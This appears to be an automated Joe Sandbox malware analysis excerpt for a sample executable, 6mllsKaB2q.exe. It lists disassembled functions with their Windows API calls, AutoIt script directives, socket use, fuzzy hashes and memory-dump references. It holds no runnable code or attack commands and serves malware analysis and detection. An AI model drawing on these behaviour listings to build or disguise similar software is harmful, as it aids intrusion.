Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ce3f4608d7be6370a95eb030e25300d34a62a8d4add262772035defcb69034f4
Instruction ID: f6fac14ffa117f28bb7b5c373f6dc45b9074b4fdd4ab9d25bd92c8632dc777ae
Opcode Fuzzy Hash: ce3f4608d7be6370a95eb030e25300d34a62a8d4add262772035defcb69034f4
Instruction Fuzzy Hash: 2C413D76900218AFDB10DFA4CD81BEEBBB8AF06300F008095FA55B7191DB706E85DBA0

Function 00BE172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6mllsKaB2q.exe,00000104), ref: 00BE1769
_free.LIBCMT ref: 00BE1834
_free.LIBCMT ref: 00BE183E

Strings

C:\Users\user\Desktop\6mllsKaB2q.exe, xrefs: 00BE1760, 00BE1767, 00BE1796, 00BE17CE

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\6mllsKaB2q.exe
API String ID: 2506810119-850682414
Opcode ID: eeef2152cc5b48171a1f2bfeec132068e146ba1d6d0d9ba043c29b2ebaa85c12
Instruction ID: 1e1308cf0c8b874833d94fe63faded4dcec2515b4d83851142421bac6755aba1
Opcode Fuzzy Hash: eeef2152cc5b48171a1f2bfeec132068e146ba1d6d0d9ba043c29b2ebaa85c12
Instruction Fuzzy Hash: BF3180B5A00298ABDB21DB9A9C81E9EBBFCEB85710B2445E6F80597211D7708E41CB90

Function 00C1C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C1C306
DeleteMenu.USER32(?,00000007,00000000), ref: 00C1C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C81990,00E35290), ref: 00C1C395

Strings

0, xrefs: 00C1C2DF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: dcd30f539e58c814d883a4c5237954daac2c8dc7959b6bbe10e9e3aaeec2839b
Instruction ID: 5feeb9ff55c3a95e25821f753841d6d10314b044c1c2abb402e4b241e29c6a49
Opcode Fuzzy Hash: dcd30f539e58c814d883a4c5237954daac2c8dc7959b6bbe10e9e3aaeec2839b
Instruction Fuzzy Hash: E941C0312443019FD720DF25D8C4B9ABBE4AF86320F00865EF9B5972A1D730E944EB56

Function 00C44416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C4CC08,00000000,?,?,?,?), ref: 00C444AA
GetWindowLongW.USER32 ref: 00C444C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C444D7

Strings

SysTreeView32, xrefs: 00C4447C

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ee8c912ad724970d2ec960b469ce72e688a4f8a01d00d8818d0f4bbeaa764b29
Instruction ID: 8aacdb0ece486a9d3ccf9fea5d18d545aef37265e9ed75e5b7aae79b5435ea9e
Opcode Fuzzy Hash: ee8c912ad724970d2ec960b469ce72e688a4f8a01d00d8818d0f4bbeaa764b29
Instruction Fuzzy Hash: 1D316B32210605ABDF249E78DC85BEA7BA9FB09334F209725F979921E0D770AD509B50

Function 00C3304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C33077,?,?), ref: 00C33378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C3307A
_wcslen.LIBCMT ref: 00C3309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00C33106

Strings

255.255.255.255, xrefs: 00C33095, 00C3309A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: b3c6f572a08794eaa15ebb4b3754e1556ba6c9943676aadfa5cc6685a340a3cb
Instruction ID: 4bb3ea1112c7d7c7a167caf65d9533b6121c433143e29fa9369e4d32913c4f7b
Opcode Fuzzy Hash: b3c6f572a08794eaa15ebb4b3754e1556ba6c9943676aadfa5cc6685a340a3cb
Instruction Fuzzy Hash: 3531D5396142819FCB14DF69C585EA977F0EF54318F248099E9258F3A2DB71DF41C760

Function 00C44653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C44705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C44713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C4471A

Strings

msctls_updown32, xrefs: 00C44684

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: a1c04d590583386408a146246c96707b970601292ad980272370229a45a79dea
Instruction ID: ab1e8960f0aeba5c85cc638fa79862ed65e29c4c0543bba77e64974c01467806
Opcode Fuzzy Hash: a1c04d590583386408a146246c96707b970601292ad980272370229a45a79dea
Instruction Fuzzy Hash: C4214AB5600209AFDB14DF64DCC1EBA37EDFB5A3A4B150059FA149B361CB70ED12CA60

Function 00C195AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00C1961D

Strings

#OnAutoItStartRegister, xrefs: 00C195F3
#requireadmin, xrefs: 00C195D9
#notrayicon, xrefs: 00C195B7

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: d9c7f23f96af0c8a6be8e151fc6b3debbb6669fb091c3a0b5212e0f3d95e80dc
Instruction ID: 695ea044d6d327bafd0c6df1a65e143508800cb5afa600b6ccab8b85a0611a34
Opcode Fuzzy Hash: d9c7f23f96af0c8a6be8e151fc6b3debbb6669fb091c3a0b5212e0f3d95e80dc
Instruction Fuzzy Hash: CD213B32104511A7D331AB259C22FF7B3D9EF93300F10407AF95997141EBB1AE82E2A5

Function 00C437B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C43840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C43850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C43876

Strings

Listbox, xrefs: 00C4380F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 779cfbd94588a6e2a942b5c4ffc04a4bc525e5a97573a84dccd4c44ec7ae3db1
Instruction ID: 97a0e3fab7a41bb8b2c614bcecb1ad4094751290e37f4ede153531708d5f1dbd
Opcode Fuzzy Hash: 779cfbd94588a6e2a942b5c4ffc04a4bc525e5a97573a84dccd4c44ec7ae3db1
Instruction Fuzzy Hash: A221BE72600218BBEB218F55CC85FBB3B6EFFC9760F118125F9549B190C671DD5287A0

Function 00C249F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C24A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C24A5C
SetErrorMode.KERNEL32(00000000,?,?,00C4CC08), ref: 00C24AD0

Strings

%lu, xrefs: 00C24A6F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: f79b629866164b0200903a3b8b11069d8512e39428e433ea44b088772db48df0
Instruction ID: 141a7034996c63ad7ff3bc7c0884ec27599e4e414b5f5d268e346ba4abd5d9c3
Opcode Fuzzy Hash: f79b629866164b0200903a3b8b11069d8512e39428e433ea44b088772db48df0
Instruction Fuzzy Hash: A4316F75A00219AFDB10DF54C885EAE7BF8EF09308F1480A9F909DB262D771EE45CB61

Function 00C441EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C4424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C44264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C44271

Strings

msctls_trackbar32, xrefs: 00C44226

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 702e58df82401108e4ce61251338075300e802164cd6313ba3b93d7f20b0084f
Instruction ID: 29f647b8a11e0d6ba780c0867c4a2b06e728d2ca9ab1db248d2d654aa70332af
Opcode Fuzzy Hash: 702e58df82401108e4ce61251338075300e802164cd6313ba3b93d7f20b0084f
Instruction Fuzzy Hash: C211C271240248BEEF205F69CC46FAB3BACFF95B64F114624FA55E60A0D6B1DC519B20

Function 00C12F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB6B57: _wcslen.LIBCMT ref: 00BB6B6A

Part of subcall function 00C12DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C12DC5
Part of subcall function 00C12DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C12DD6
Part of subcall function 00C12DA7: GetCurrentThreadId.KERNEL32 ref: 00C12DDD
Part of subcall function 00C12DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C12DE4

GetFocus.USER32 ref: 00C12F78

Part of subcall function 00C12DEE: GetParent.USER32(00000000), ref: 00C12DF9

GetClassNameW.USER32(?,?,00000100), ref: 00C12FC3
EnumChildWindows.USER32(?,00C1303B), ref: 00C12FEB

Strings

%s%d, xrefs: 00C12FFF

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 2974421280ea6539540ca021b4edc6987555863937e0eb9102690839c2ab3845
Instruction ID: 1ae4f8a6c8267d2e8d84982741ae3aacc3b6a78eb243b1b5e20f80adf7cf29ad
Opcode Fuzzy Hash: 2974421280ea6539540ca021b4edc6987555863937e0eb9102690839c2ab3845
Instruction Fuzzy Hash: AC11A2756002056BDF547F60DCD6FED37AAAF8A304F048075B9099B252DE709A85EB70

Function 00C45882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C458C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C458EE
DrawMenuBar.USER32(?), ref: 00C458FD

Strings

0, xrefs: 00C4588F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: a03bdfa64473742ae506026af1c70a96e824a11fc584d4b47486c12d0b8ea898
Instruction ID: 03fe3326cc7a9606da3a9cd00873b646c426a4fb0e85bef5c303ea9d1fb746e8
Opcode Fuzzy Hash: a03bdfa64473742ae506026af1c70a96e824a11fc584d4b47486c12d0b8ea898
Instruction Fuzzy Hash: 1A018C31501219EFDB619F21DC44FAEBBB5FF46760F1080E9E849DA162DB308A85EF21

Function 00C1007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae8f2d53fe8266403301b372aa743dd587f651d1f42a15ff582d7722828babbc
Instruction ID: 3c06b98cd670a9dfa4a37fc7a6930d9687d5e79bce7e536bb09d69d7c9ed8e1c
Opcode Fuzzy Hash: ae8f2d53fe8266403301b372aa743dd587f651d1f42a15ff582d7722828babbc
Instruction Fuzzy Hash: B1C15C75A0020AEFDB14CF94C898AAEB7B5FF49304F208598E515EB261D771DEC2DB90

Function 00C3342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C33459
CoUninitialize.OLE32 ref: 00C33463
VariantInit.OLEAUT32(?), ref: 00C3346E
VariantClear.OLEAUT32(?), ref: 00C3371B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: e757ed3cff5141b216a7bf778f3e6cbc2bf67d174379ed6e91739cd6e818499c
Instruction ID: f900d8dc78b09fe37094031c545544abef8004f6e79963a05a93fa6c642e2a51
Opcode Fuzzy Hash: e757ed3cff5141b216a7bf778f3e6cbc2bf67d174379ed6e91739cd6e818499c
Instruction Fuzzy Hash: ACA15A756143009FC710DF28C596A6AB7E5FF89714F04889DF98A9B362DB70EE01CB92

Function 00C10436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C4FC08,?), ref: 00C105F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C4FC08,?), ref: 00C10608
CLSIDFromProgID.OLE32(?,?,00000000,00C4CC40,000000FF,?,00000000,00000800,00000000,?,00C4FC08,?), ref: 00C1062D
_memcmp.LIBVCRUNTIME ref: 00C1064E

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 628874c3a3f78744cf5b08e8e7247ff289ae45d860732f0322627718a52827b6
Instruction ID: e7234eafa748daa5f55eeaa172c44a4ba54146959c85292227262f8b92d3d344
Opcode Fuzzy Hash: 628874c3a3f78744cf5b08e8e7247ff289ae45d860732f0322627718a52827b6
Instruction Fuzzy Hash: 47812C71A00109EFCB04DF94C984EEEB7B9FF89315F204598F516AB250DB71AE86CB60

Function 00BF1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BF14C0

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 04758bf326b32667b84acedb68ffca8ecf2c9c082c1e51e6d19520f894c95865
Instruction ID: 5797217f661df1df44c03453c521a9f70e4da810ea37ed0901b90af10d1f16b4
Opcode Fuzzy Hash: 04758bf326b32667b84acedb68ffca8ecf2c9c082c1e51e6d19520f894c95865
Instruction Fuzzy Hash: 6F417C31600109EBDB216BBD9C857BE7AE4EF81330F144EE6FA19D3392E73448095A71

Function 00C46278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00E3E9E8,?), ref: 00C462E2
ScreenToClient.USER32(?,?), ref: 00C46315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00C46382

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: bbf09b34edfa5498c334762f47c766adf082d7cb2ccae95610937ec398af8d1e
Instruction ID: 4864084cb020c516820c88f86e2d739ff6b3f4186e36f8b9dc3fe92bbaaa4854
Opcode Fuzzy Hash: bbf09b34edfa5498c334762f47c766adf082d7cb2ccae95610937ec398af8d1e
Instruction Fuzzy Hash: CC516F74A00249EFCF24DF54D880AAE7BB5FF46360F108259F925972A4D730EE41CB51

Function 00C31AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00C31AFD
WSAGetLastError.WSOCK32 ref: 00C31B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C31B8A
WSAGetLastError.WSOCK32 ref: 00C31B94

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 9b99b2e13f1743b5b9b054a01360649a437a51963e37da8ee12617ca2527138f
Instruction ID: 8c725d68f0037ea23e326db49bf07657e197af763b9238d267d281d7ae567d9c
Opcode Fuzzy Hash: 9b99b2e13f1743b5b9b054a01360649a437a51963e37da8ee12617ca2527138f
Instruction Fuzzy Hash: 4D418174640200AFE720AF24C886F7A77E5AB44718F58849CF91A9F7D2D7B2DD41CB90

